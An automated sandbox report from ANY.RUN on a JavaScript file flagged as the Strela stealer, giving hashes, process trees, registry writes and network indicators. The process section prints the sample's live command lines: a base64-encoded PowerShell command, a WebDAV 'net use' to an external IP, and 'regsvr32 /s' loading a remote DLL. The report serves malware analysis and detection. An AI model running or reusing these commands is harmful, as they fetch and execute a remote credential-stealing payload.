File name:

39837570410621389.js

Full analysis: https://app.any.run/tasks/78f37868-d278-4952-a12b-47a16902bb01
Verdict: Malicious activity
Threats:

Stealers are a group of malicious software that are intended for gaining unauthorized access to users’ information and transferring it to the attacker. The stealer malware category includes various types of programs that focus on their particular kind of data, including files, passwords, and cryptocurrency. Stealers are capable of spying on their targets by recording their keystrokes and taking screenshots. This type of malware is primarily distributed as part of phishing campaigns.

Malware Trends Tracker     >>>
Analysis date: December 13, 2024, 10:19:27
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
webdav
strela
stealer
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines (65536), with no line terminators
MD5:

1C6F8E225D9E2ED2D615DCFCC336B8D4

SHA1:

1E6EBE5C8B5D274992FFFD07C09844A7605F1CEE

SHA256:

0246FF5EBDBA32E4C6BF0206EDAE5FF80BD12E428C7F3E1CF772E746862838D0

SSDEEP:

1536:6vvkgPyEhwtud5aLSOfZbS9VqqOfbS9tjejojTKTA:OGdui+OdS9VqqOjS9tjejojTKTA

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Registers / Runs the DLL via REGSVR32.EXE

      • cmd.exe (PID: 4544)

    • STRELA has been detected

      • powershell.exe (PID: 3652)
      • cmd.exe (PID: 4544)

    • WebDav connection (SURICATA)

      • net.exe (PID: 5872)

  • SUSPICIOUS

    • Base64-obfuscated command line is found

      • cmd.exe (PID: 3532)

    • Starts CMD.EXE for commands execution

      • wscript.exe (PID: 3144)
      • powershell.exe (PID: 3652)

    • Connects to unusual port

      • net.exe (PID: 5872)

    • Starts NET.EXE to map network drives

      • cmd.exe (PID: 3080)

    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 3144)

    • BASE64 encoded PowerShell command has been detected

      • cmd.exe (PID: 3532)

    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 3532)

  • INFO

    • Checks proxy server information

      • net.exe (PID: 5872)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
127
Monitored processes
8
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
start wscript.exe no specs cmd.exe no specs conhost.exe no specs #STRELA powershell.exe no specs cmd.exe no specs net.exe #STRELA cmd.exe no specs regsvr32.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3080"C:\WINDOWS\system32\cmd.exe" /c net use \\94.159.113.204@8888\davwwwroot\C:\Windows\System32\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
2
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\bcrypt.dll
3144"C:\Windows\System32\WScript.exe" C:\Users\admin\Desktop\39837570410621389.jsC:\Windows\System32\wscript.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.812.10240.16384
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
3532"C:\Windows\System32\cmd.exe" /c powershell -EncodedCommand YwBtAGQAIAAvAGMAIABuAGUAdAAgAHUAcwBlACAAXABcADkANAAuADEANQA5AC4AMQAxADMALgAyADAANABAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAOwA7ADsAOwA7ADsAOwA7AGMAbQBkACAALwBjACAAcgBlAGcAcwB2AHIAMwAyACAALwBzACAAXABcADkANAAuADEANQA5AC4AMQAxADMALgAyADAANABAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAMQA2ADUANgAyADIAMgA0ADMANgAyADMANgAuAGQAbABsAA==C:\Windows\System32\cmd.exewscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\bcrypt.dll
3652powershell -EncodedCommand YwBtAGQAIAAvAGMAIABuAGUAdAAgAHUAcwBlACAAXABcADkANAAuADEANQA5AC4AMQAxADMALgAyADAANABAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAOwA7ADsAOwA7ADsAOwA7AGMAbQBkACAALwBjACAAcgBlAGcAcwB2AHIAMwAyACAALwBzACAAXABcADkANAAuADEANQA5AC4AMQAxADMALgAyADAANABAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAMQA2ADUANgAyADIAMgA0ADMANgAyADMANgAuAGQAbABsAA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
4120regsvr32 /s \\94.159.113.204@8888\davwwwroot\1656222436236.dllC:\Windows\System32\regsvr32.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft(C) Register Server
Exit code:
3
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\regsvr32.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\aclayers.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
4544"C:\WINDOWS\system32\cmd.exe" /c regsvr32 /s \\94.159.113.204@8888\davwwwroot\1656222436236.dllC:\Windows\System32\cmd.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
3
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\bcrypt.dll
4716\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
5872net use \\94.159.113.204@8888\davwwwroot\C:\Windows\System32\net.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Net Command
Exit code:
2
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\net.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\mpr.dll
Total events
4 800
Read events
4 799
Write events
1
Delete events
0

Modification events

(PID) Process:(3144) wscript.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe
Operation:writeName:JScriptSetScriptStateStarted
Value:
1560130000000000
Executable files
0
Suspicious files
1
Text files
2
Unknown types
0

Dropped files

PID
Process
Filename
Type
3652powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_2qkj0jwb.pcd.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
3652powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_nyhn1yip.b5e.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
3652powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:61D72CE6BA54438A4DCF2C436544B5B7
SHA256:2BC8A3F47B2AE2DE43107198EB51B512283C395C48E8FB168009BFC2AE4CA006
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
6
TCP/UDP connections
20
DNS requests
5
Threats
1

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
5872
net.exe
OPTIONS
500
94.159.113.204:8888
http://94.159.113.204:8888/
unknown
unknown
640
svchost.exe
GET
200
2.16.164.106:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
1520
RUXIMICS.exe
GET
200
2.16.164.106:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
640
svchost.exe
GET
200
88.221.169.152:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
1520
RUXIMICS.exe
GET
200
88.221.169.152:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
4712
MoUsoCoreWorker.exe
GET
200
88.221.169.152:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4712
MoUsoCoreWorker.exe
20.73.194.208:443
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
192.168.100.255:137
whitelisted
1520
RUXIMICS.exe
20.73.194.208:443
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
640
svchost.exe
20.73.194.208:443
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
4
System
192.168.100.255:138
whitelisted
5872
net.exe
94.159.113.204:8888
NetCom-R LLC
RU
unknown
640
svchost.exe
2.16.164.106:80
crl.microsoft.com
Akamai International B.V.
NL
whitelisted
1520
RUXIMICS.exe
2.16.164.106:80
crl.microsoft.com
Akamai International B.V.
NL
whitelisted
640
svchost.exe
88.221.169.152:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
1520
RUXIMICS.exe
88.221.169.152:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted

DNS requests

Domain
IP
Reputation
google.com
  • 142.250.185.174
whitelisted
crl.microsoft.com
  • 2.16.164.106
  • 2.16.164.49
whitelisted
www.microsoft.com
  • 88.221.169.152
whitelisted
settings-win.data.microsoft.com
  • 4.231.128.59
whitelisted
self.events.data.microsoft.com
  • 51.132.193.104
whitelisted

Threats

Found threats are available for the paid subscriptions
1 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
39837570410621389.js